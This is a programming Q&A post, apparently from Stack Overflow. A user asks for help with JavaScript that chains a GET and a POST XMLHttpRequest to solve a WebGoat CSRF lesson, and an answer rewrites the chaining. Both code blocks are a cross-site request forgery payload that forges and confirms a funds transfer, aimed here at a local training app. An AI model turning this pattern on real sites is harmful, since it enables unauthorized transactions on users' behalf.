# XMLHttpRequet in JavaScript

Tags: javascript

I tried to solve `WebGoat` prompt bypass using [javascript](/questions/tagged/javascript)code depending on `XMLHttpRequet` to send multiple requests of different types, since the first request is of **GET** type and the second one is of **POST** type.
The code is:

```
<script>
  var req1 = new XMLHttpRequest();
  req1.onreadystatechange = function() {

    if (req1.readyState == 4 && req1.status == 200) {

      req2 = new XMLHttpRequest();
      req2.open("POST", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900", false);
      req2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); //shoud be specified in the POST requests
      req2.send("transferFunds=CONFIRM");

    }

  };
  req1.open("GET", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000", false);
  req1.send();
</script>
```

When saving this code as [html](/questions/tagged/html)file and opening it then monitoring the requests no any requests appeared except the `GET` one and it's status is `302`. What should I do for this code to be executed successfully?
Browser is : Firefox 40.0.3
WebGoat Version: 6.0.1

Answer (score 0):

You might try chaining requests.

Executes first request, if the «callback function» returns 200 ok, then executes the next request.

I've made an example.

```js
(function() {


  // Implements XMLHttpRequest object to use in requests.
  function sendServer(options) {
    var newXHR = new XMLHttpRequest() || new ActiveXObject("Microsoft.XMLHTTP");
    options.async = true;
    options.contentType = options.contentType || "application/x-www-form-urlencoded";
    newXHR.open(options.type, options.url, options.async || true);
    newXHR.setRequestHeader("Content-Type", options.contentType);
    newXHR.send((options.type == "POST") ? options.data : null);
    newXHR.onreadystatechange = options.callback;
    return newXHR;
  }



  // Usage:

  // First request: GET
  sendServer({
    type: "GET",
    url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000",
    data: null,
    async: false,
    callback: function(xhr) {
      if (xhr.target.readyState === 4 && xhr.target.status === 200) {

        // Second request: POST
        sendServer({
          type: "POST",
          url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900",
          data: "transferFunds=CONFIRM",
          async: false,
          callback: function(xhr) {
            if (xhr.target.readyState === 4 && xhr.target.status === 200) {
              console.log(xhr.target.responseText); // Checks the response.
            }
          }
        });
      }
    }
  });



})();
```

Reference: http://jsfiddle.net/dannyjhonston/jppz5nk3/1/